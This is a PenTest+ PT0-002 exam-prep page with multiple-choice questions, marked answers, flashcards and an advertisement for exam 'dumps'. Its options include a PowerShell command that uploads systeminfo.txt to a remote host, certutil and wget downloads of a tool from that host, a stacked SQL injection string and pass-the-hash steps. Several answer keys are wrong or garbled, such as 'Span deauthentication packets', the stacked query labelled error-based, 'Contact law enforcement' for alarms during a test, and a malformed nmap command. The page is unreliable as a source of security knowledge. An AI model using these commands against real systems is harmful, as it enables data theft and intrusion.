CompTIA PenTest+ PT0-002 Exam Preparation
48 Questions
Questions and Answers

Which vulnerability allows a tester to obtain credentials by querying a cloud provider's metadata?

  • Server-side request forgery (correct)
  • Local file inclusion
  • Remote file inclusion
  • Cross-site request forgery

What command can a penetration tester use to download a file from a remote server to assist in exploring service permissions?

  • wget http://192.168.2.124/windows-binaries/accesschk64.exe -O accesschk64.exe
  • schtasks /query /fo LIST /v | find /I "Next Run Time:"
  • powershell (New-Object System.Net.WebClient).UploadFile('http://192.168.2.124/upload.php', 'systeminfo.txt')
  • certutil -urlcache -split -f http://192.168.2.124/windows-binaries/accesschk64.exe (correct)

Which command would a penetration tester use to perform a ping scan on a subnet?

  • nmap -sn 10.12.1.0/24 (correct)
  • nmap -sV -A 10.12.1.0/24
  • nmap -Pn 10.12.1.0/24
  • nmap -sT -p- 10.12.1.0/24

What is the most effective recommendation to secure a wireless network after an unauthorized access event using Aircrack-ng?

  • Changing to Wi-Fi equipment that supports strong encryption (A) (correct)

Which benefit does the command 'schtasks /query /fo LIST /v | find /I "Next Run Time:"' provide when exploring service permissions?

  • Lists all scheduled tasks and their next run times (C) (correct)

What aspect of testing does server-side request forgery highlight when accessing cloud provider metadata?

  • Obtaining sensitive environment data (D) (correct)

What is the best method for a penetration tester to pivot and gain additional access to a network when faced with restrictive ACLs on a wireless subnet?

  • Span deauthentication packets to the wireless clients. (D) (correct)

Which approach is NOT recommended to enhance wireless security?

  • Using WEP encryption (D) (correct)

What likely caused all 65,535 ports to be reported as filtered during a second Nmap scan?

  • A firewall or IPS blocked the scan. (A) (correct)

Which tool provides an exploitation suite with payload modules covering the broadest range of target system types?

  • Metasploit (A) (correct)

What impact does using 'nmap -sV -A 10.12.1.0/24' have when assessing a network?

  • It provides versioning and OS detection for services running on hosts (B) (correct)

Which tool combination would be most effective for preparing an attack after discovering a PHP script in a vulnerable state?

  • Burp Suite and DIRB (A) (correct)

What does the -F option in an Nmap scan refer to?

  • Fast scan that checks only common ports. (B) (correct)

If a penetration tester finds a PHP script in an unprotected internal repository, what should be the primary concern?

  • The script may contain security vulnerabilities. (A) (correct)

Which of the following responses is NOT a potential countermeasure a firewall might perform during a network scan?

  • Automatically updating signature definitions. (B) (correct)

In the context of penetration testing, what is an 'evil twin' attack?

  • A technique of impersonating a legitimate access point. (C) (correct)

After discovering a vulnerability and failing to report it, what is the appropriate next step for the company?

  • Investigate the penetration tester (D) (correct)

What should a company verify first when it wants to test the security of its hosted data after obtaining permission from a cloud service provider?

  • Whether sensitive client data is publicly accessible (A) (correct)

What is an example of a Bluesnarfing attack that a penetration tester could perform?

  • Dump the user address book on the device (D) (correct)

Why is it critical for companies to thoroughly investigate after a breach has occurred?

  • To determine the cause and prevent future incidents (D) (correct)

Which of the following is NOT a recommended action after notifying a client about a data breach?

  • Increase marketing efforts to regain client trust (A) (correct)

What outcomes can a poorly executed penetration test lead to?

  • Unauthorized access to sensitive data (A) (correct)

What action should be prioritized to ensure client data is protected in a cloud environment?

  • Strict access controls (C) (correct)

What is the primary goal of conducting a vulnerability scan?

  • To identify potential security weaknesses (C) (correct)

Which of the following actions would be considered unethical according to the SOW? (Select two)

  • Failing to share with the client critical vulnerabilities that exist within the client architecture to appease the client's senior leadership team (B) (correct)
  • Seeking help with the engagement in underground hacker forums by sharing the client's public IP address (C) (correct)

What is the most likely reason for receiving TCP resets during the assessment of web servers?

  • The web server is using a Web Application Firewall (WAF) (B) (correct)

What should a penetration tester do with client findings after an engagement according to the SOW?

  • Dispose of findings by erasing them in a secure manner (A) (correct)

Which behavior aligns with ethical standards when working with a client’s confidential information?

  • Encrypting findings before delivering them to the client (A) (correct)

In the context of the SOW, which of the following actions could be potentially harmful to the client's security?

  • Disregarding security protocols of the engagement (B) (correct)

When a WAF resets a TCP connection, what is it likely responding to?

  • Malformed packets or suspected attacks (C) (correct)

What is a primary responsibility of a penetration tester concerning client confidentiality?

  • Maintaining confidentiality of sensitive information regarding the client (B) (correct)

Which practice could lead to ethical violations in penetration testing?

  • Failing to report critical vulnerabilities to the client (D) (correct)

Which tool is the penetration tester MOST likely to use for performing a vulnerability scan against a web server?

  • Nikto (A) (correct)

What type of SQL injection attack is indicated by the input '1;SELECT Username, Password FROM Users;'?

  • Error-based (C) (correct)

Based on Nmap scan results, which operating system is the target MOST likely running if the scan points to Windows features?

  • Windows Server (C) (correct)

Which Nmap command correctly scans for UDP services SNMP, NetBIOS, and DNS?

  • nmap -vv sUV -p 53,137-139,161-162 10.10.1.20/24 -oA udpscan (C) (correct)

What should a company do NEXT if security alarms are triggered during a penetration test?

  • Contact law enforcement. (D) (correct)

Which scenario BEST explains why a penetration tester cannot scan a server that was previously scanned successfully?

  • The IP address is on the blocklist. (A) (correct)

In which scenario would a penetration tester most likely use Nmap?

  • To perform a network discovery. (A) (correct)

Which of the following correctly represents a limitation of penetration testing?

  • It can only evaluate known vulnerabilities. (C) (correct)

What is the primary reason for TCP resets from a web server when a WAF is present?

  • The WAF is blocking legitimate traffic. (B) (correct)

Which recommendation should a penetration tester make to address the use of vulnerable third-party modules in products?

  • Add a dependency checker into the tool chain. (B) (correct)

What change is necessary for fixing the Perl script used to identify vulnerabilities in network switches?

  • Remove unnecessary variables and streamline the code. (B) (correct)

Which tool should be used to pass the hash once password hashes are extracted from lsass.exe?

  • Mimikatz (D) (correct)

What is the most effective way to ensure the security of API settings before a deployment?

  • Implement strict validation protocols. (B) (correct)

What tool is recommended for achieving persistence after passing the hash?

  • WMI (A) (correct)

Which option describes a common outcome when a penetration tester uses a dependency checker during the software development process?

  • Detecting and addressing known vulnerabilities in libraries. (B) (correct)

What is a critical step to ensure the Perl script runs properly?

  • Modifying specific lines to correct initialization. (A) (correct)

Flashcards

Pivot Attack Method (Wireless Subnet)

Gaining access to a network by exploiting a vulnerability to move from a compromised system (e.g. a laptop) to a wider network.

Nmap Scan Flags (filtered ports)

A scan result in which Nmap reports every port as filtered, indicating that a firewall or Intrusion Prevention System (IPS) is blocking the probes.

Comprehensive Exploitation Suite

A software tool that is designed to enable complete penetration testing.

Web Application Vulnerability (PHP)

Vulnerability found in a PHP web application script that could be exploited in an unprotected source repository.

Penetration Testing Toolset (PHP)

Tools that assist in preparing for attacks on web application vulnerabilities caused by PHP code.

Port Scanning (Nmap -F)

Fast scan using Nmap, checks a small number of common ports to quickly assess if a service responds.

Evil Twin Attacks

Creating a fake wireless access point that mimics a legitimate one and lures users into connecting to it.

De-authentication

A wireless attack that forces the disconnection of a wireless client.

Server-Side Request Forgery (SSRF)

An attack where an attacker tricks a server into making requests to other servers on the network.

Exploiting Instance Credentials (metadata)

Gaining access to cloud server credentials by querying cloud provider metadata.

Low-Privilege Shell

A type of shell account with limited access on a system.

Misconfigured Service Permissions

Vulnerability where a service has more permissions than it should, a security misconfiguration.

Ping Scan

A network scan technique that uses ICMP echo requests to discover live hosts on a network.

Wireless Network Remediation

Actions to secure a wireless network, typically addressing weak encryption.

Impersonating IT Help Desk

Using deception to gain access to sensitive information or control.

Strong Encryption (Wi-Fi)

Using robust encryption protocols (like WPA2/3) to secure wireless transmissions.

Penetration Tester's Responsibility

A penetration tester is responsible for identifying and reporting vulnerabilities in a system. Failing to report a vulnerability and leaving it unfixed is unethical and potentially harmful.

Vulnerability Scan Permission

Before scanning a system, verify that permission has been obtained from the appropriate parties, especially the cloud service provider.

Initial Risk Assessment Focus

First, evaluate if sensitive data is publicly accessible in a hosted environment to assess a critical risk that affects data confidentiality.

Bluesnarfing Attack

Bluesnarfing is an attack method where a penetration tester can gain unauthorized access to the information stored on a Bluetooth-enabled mobile device. This allows them to access personal information.

Unauthorized Access

Gaining access to a system, network, or data without official permission.

Data Confidentiality

Protecting sensitive data from unauthorized access or disclosure.

Penetration Test Follow-Up

After a penetration test, the appropriate action is to investigate who is potentially accountable for a vulnerability and its associated issues.

Secure SDLC

Secure Software Development Lifecycle (SDLC) is a process to design, develop, and deploy applications following security standards in phases.

Unethical Penetration Tester Behavior

Actions that violate professional ethics, potentially harming the client or compromising security.

Proprietary Penetration Testing Tools

Tools not publicly available or accessible to the client for review.

Hiding Critical Vulnerabilities

Failure to report critical security flaws in a client's system to please senior management, potentially jeopardizing the system's security.

Using Underground Forums

Seeking assistance from hacker forums for engagements, potentially exposing client information.

TCP Resets During Assessment

Web server disconnecting connections abruptly during a penetration test, often caused by a Web Application Firewall (WAF).

Web Application Firewall (WAF)

A security system designed to protect web applications from attacks by filtering traffic.

Client Confidential Information

Data like network diagrams, asset inventory, and employee names that are confidential.

Secure Disposal of Findings

Properly erasing or deleting findings after the penetration testing engagement using secure methods.

Nikto

A web server vulnerability scanner used by penetration testers to identify potential security weaknesses.

Error-Based SQL Injection

A type of SQL injection attack where the attacker injects malicious SQL code and observes the server's error messages to gain information about the database structure.

Nmap Scan for UDP Services

Using Nmap to scan specific UDP ports for running services like SNMP, NetBIOS, and DNS.

Penetration Test Deconfliction

The process of coordinating with the organization being tested to ensure the test doesn't cause unwanted disruptions or security alerts.

Blocked IP Address

An IP address that is prevented from accessing a network or server due to security rules or blacklisting.

WAF and TCP Resets

A Web Application Firewall (WAF) may cause TCP reset packets to be sent back to a penetration tester during scanning. This happens because the WAF is actively blocking or filtering malicious requests.

Dependency Checker

A tool that analyzes software code to identify and report on the use of vulnerable third-party libraries or modules. This helps developers avoid security issues by ensuring that their code uses safe and up-to-date components.

Vulnerable Third-Party Modules

Software components created by other companies and used within a larger application. If these modules have known weaknesses (vulnerabilities), they can expose the entire application to security risks.

Mimikatz

A tool often used by penetration testers to extract logon passwords from the memory of a target system. It can retrieve credentials stored in the LSASS (Local Security Authority Subsystem Service) process.

Pass the Hash

A technique used to gain unauthorized access to a system by leveraging stolen password hashes. Instead of cracking the hash and getting the actual password, the attacker directly uses the hash to authenticate.

Persistence (Penetration Testing)

The ability of an attacker to maintain access and control over a compromised system even after a reboot or system changes. It involves establishing a backdoor or setting up mechanisms for re-gaining access.

PsExec

A tool often used in combination with Mimikatz to execute commands or programs on remote systems using stolen credentials. It allows attackers to maintain persistence and control.

Empire

A post-exploitation framework used by penetration testers to establish and maintain persistence on a compromised system. It provides a variety of tools and techniques for monitoring and controlling the target.

Study Notes

CompTIA PenTest+ PT0-002 Dumps

  • CertLeader provides 100% valid and up-to-date practice questions and answers for the CompTIA PenTest+ certification exam (PT0-002).
  • The dumps contain 253 questions and answers.
  • The website provides links to access the practice materials.
  • The dumps cover the CompTIA PenTest+ certification exam.

Related Documents

PT0-002 Practice Questions PDF

Description

Get ready for your CompTIA PenTest+ PT0-002 exam with our comprehensive practice questions and answers. This quiz includes 253 valid and up-to-date questions, designed to help you succeed in your certification goals. Access the best preparatory materials to boost your confidence and performance on exam day.
